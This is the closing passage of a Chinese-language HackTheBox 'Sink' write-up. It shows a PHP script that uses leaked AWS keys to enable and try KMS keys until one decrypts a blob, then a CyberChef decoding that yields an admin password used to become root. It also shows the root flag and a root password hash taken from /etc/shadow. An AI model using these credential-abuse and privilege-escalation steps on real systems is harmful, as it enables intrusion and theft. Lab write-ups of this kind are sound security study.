"881df7e3-fb6f-4c7b-9195-7f210e79e525"
"c5217c17-5675-42f7-a6ec-b5aa9b9dbbde"
"f0579746-10c3-4fd1-b2ab-f312a5a0f3fc"
"f2358fef-e813-4c59-87c8-70e50f6d4f70"

decrypt

  • decrypt.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
require 'vendor/autoload.php';

use Aws\Kms\KmsClient;
use Aws\Exception\AwsException;

$KmsClient = new Aws\Kms\KmsClient([
'version' => 'latest',
'region' => 'eu',
'credentials' => [
'key' => 'AKIAIUEN3QWCPSTEITJQ',
'secret' => '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'
],
'endpoint' => 'http://127.0.0.1:4566'
]);

$keys = ["0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
"16754494-4333-4f77-ad4c-d0b73d799939",
"2378914f-ea22-47af-8b0c-8252ef09cd5f",
"2bf9c582-eed7-482f-bfb6-2e4e7eb88b78",
"53bb45ef-bf96-47b2-a423-74d9b89a297a",
"804125db-bdf1-465a-a058-07fc87c0fad0",
"837a2f6e-e64c-45bc-a7aa-efa56a550401",
"881df7e3-fb6f-4c7b-9195-7f210e79e525",
"c5217c17-5675-42f7-a6ec-b5aa9b9dbbde",
"f0579746-10c3-4fd1-b2ab-f312a5a0f3fc",
"f2358fef-e813-4c59-87c8-70e50f6d4f70"];
$cipherb64 = "mXMs+8ZLEp9krGLLJT2YHLgHQP/uRJYSfX+YTqar7wabvOQ8PSuPwUFAmEJh86q3kaURmnRxr/smZvkU6Pp0KPV7ye2sP10hvPJDF2mkNcIEVif3RaMU08jZi7U/ghZyoXseM6EEcu9c1gYpDqZ74CMEh7AoasksLswCJJZYI0TfcvTlXx84XBfCWsK7cTyDb4SughAq9MY89Q6lt7gnw6IwG/tSHi9a1MY8eblCwCMNwRrFQ44x8p3hS2FLxZe2iKUrpiyUDmdThpFJPcM3uxiXU+cuyZJgxzQ2Wl0Gqaj0RpVD2w2wJGrQBnCnouahOD1SXT3DwrUMWXyeNMc52lWo3aB+mq/uhLxcTeGSImHJcfUYYQqXoIrOHcS7O1WFoaMvMtIAl+uRslGVSEwiU6sVe9nMCuyvrsbsQ0N46jjro5h1nFmTmZ0C1Xr97Go/pHmJxgG1lxnOepsglLrPMXc5F6lFH1aKxlzFVAxGKWNAzTlzGC+HnBXjugLpP8Shpb24HPdnt/fF/dda8qyaMcYZCOmLODums2+ROtrPJ4CTuaiSbOWJuheQ6U/v5AbeQSF93RF28iyiA905SCNRi3ejGDH65OWv6aw1VnTf8TaREPH5ZNLazTW5Jo8kvLqJaEtZISRNUEmsJHr79U1VjpovPzePTKeDTR0qosW/GJ8=";

for ($i=0; $i<count($keys); $i++) {

try {
$result = $KmsClient->enableKey([
'KeyId' => $keys[$i],
]);

$result = $KmsClient->decrypt([
'CiphertextBlob' => base64_decode($cipherb64),
'KeyId' => $keys[$i],
'EncryptionAlgorithm' => 'RSAES_OAEP_SHA_256',
]);
echo base64_encode($result["Plaintext"]);
}
catch (AwsException $e) {
}
}

运行php脚本

1
2
3
┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# php decrypt.php
H4sIAAAAAAAAAytOLSpLLSrWq8zNYaAVMAACMxMTMA0E6LSBkaExg6GxubmJqbmxqZkxg4GhkYGhAYOCAc1chARKi0sSixQUGIry80vwqSMkP0RBMTj+rbgUFHIyi0tS8xJTUoqsFJSUgAIF+UUlVgoWBkBmRn5xSTFIkYKCrkJyalFJsV5xZl62XkZJElSwLLE0pwQhmJKaBhIoLYaYnZeYm2qlkJiSm5kHMjixuNhKIb40tSqlNFDRNdLU0SMt1YhroINiRIJiaP4vzkynmR2E878hLP+bGALZBoaG5qamo/mfHsCgsY3JUVnT6ra3Ea8jq+qJhVuVUw32RXC+5E7RteNPdm7ff712xavQy6bsqbYZO3alZbyJ22V5nP/XtANG+iunh08t2GdR9vUKk2ON1IfdsSs864IuWBr95xPdoDtL9cA+janZtRmJyt8crn9a5V7e9aXp1BcO7bfCFyZ0v1w6a8vLAw7OG9crNK/RWukXUDTQATEKRsEoGAWjYBSMglEwCkbBKBgFo2AUjIJRMApGwSgYBaNgFIyCUTAKRsEoGAWjYBSMglEwRAEATgL7TAAoAAA=

servers.yml

解密base64密文得到明文,gzip解压后是servers.yml,里面有密码:

use online cyberchef

  • cyberchef

cyberchef解码的url:

1
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Gunzip()&input=SDRzSUFBQUFBQUFBQXl0T0xTcExMU3JXcTh6TllhQVZNQUFDTXhNVE1BMEU2TFNCa2FFeGc2R3h1Ym1KcWJteHFaa3hnNEdoa1lHaEFZT0NBYzFjaEFSS2kwc1NpeFFVR0lyeTgwdndxU01rUDBSQk1UaityYmdVRkhJeWkwdFM4eEpUVW9xc0ZKU1VnQUlGK1VVbFZnb1dCa0JtUm41eFNURklrWUtDcmtKeWFsRkpzVjV4Wmw2MlhrWkpFbFN3TExFMHB3UWhtSkthQmhJb0xZYVluWmVZbTJxbGtKaVNtNWtITWppeHVOaEtJYjQwdFNxbE5GRFJOZExVMFNNdDFZaHJvSU5pUklKaWFQNHZ6a3lubVIyRTg3OGhMUCtiR0FMWkJvYUc1cWFtby9tZkhzQ2dzWTNKVVZuVDZyYTNFYThqcStxSmhWdVZVdzMyUlhDKzVFN1J0ZU5QZG03ZmY3MTJ4YXZReTZic3FiWVpPM2FsWmJ5SjIyVjVuUC9YdEFORytpdW5oMDh0MkdkUjl2VUtrMk9OMUlmZHNTczg2NEl1V0JyOTV4UGRvRHRMOWNBK2phblp0Um1KeXQ4Y3JuOWE1VjdlOWFYcDFCY083YmZDRnlaMHYxdzZhOHZMQXc3T0c5Y3JOSy9SV3VrWFVEVFFBVEVLUnNFb0dBV2pZQlNNZ2xFd0NrYkJLQmdGbzJBVWpJSlJNQXBHd1NnWUJhTmdGSXlDVVRBS1JzRW9HQVdqWUJTTWdsRXdSQUVBVGdMN1RBQW9BQUE9

cyberchef解码结果:

1
2
3
4
5
6
7
8
9
10
11
servers.yml.........................................................................................0000644.0000000.0000000.00000000213.13774573563.012010. 0....................................................................................................ustar  .root............................root...................................................................................................................................................................................................................server:
listenaddr: ""
port: 80
hosts:
- certs.sink.htb
- vault.sink.htb
defaultuser:
name: admin
pass: _uezduQ!EY5AHfe2
.....................................................................................................................................................................................................................................................................................................................................................................................servers.sig.........................................................................................0000644.0000000.0000000.00000000211.13774574111.011755. 0....................................................................................................ustar .root............................root...................................................................................................................................................................................................................0...A#):ÛK2
A.%È¡µ#e0¾X é.d->.cC.¿×}¨êUÓ5.e=h¸ºfhì^º9Ç.ú.À2/©.W.p¾8võÔ.A|.ð»]¨I~RÐ92ÿ..°-.%À¾(.k}ha#ö@×òªGw.ô.Êô.+í.Ð..é¥.´éÀ@C±¯ .¬*©NPr............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

get root

1
2
name: admin
pass: _uezduQ!EY5AHfe2

这个密码就是root密码,直接ssh登录,得到root.txt:

1
2
3
4
5
6
7
8
9
10
11
12
13
david@sink:~$ su root
Password:
root@sink:/home/david# id
uid=0(root) gid=0(root) groups=0(root)
root@sink:/home/david# whoami
root
root@sink:/home/david# cd
root@sink:~# ls
automation desync docker-compose.yml root.txt snap
root@sink:~# cat root.txt
5e3a99117cded05e500c24e3160cdf27
root@sink:~# cat /etc/shadow | grep root
root:$6$PYtd2G7mK9kPLNkn$9kn.hmGZhQ1Am5Pyi2.o.Lt6k7ned9iHRyXIu4yg28NkHW0UTf9IaZ7NA7P5spZJK9CDIYYnW9P1najKD8ETA.:18598:0:99999:7:::

Summary of knowledge

  • 请求走私触发管理员的request得到管理员的cookie
  • 撞密码
  • aws key及secret利用操作获取账号密码
  • aws listkeys操作解密.enc文件
  • cyberchef利用base64 + Gunzip解码获得账号密码

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…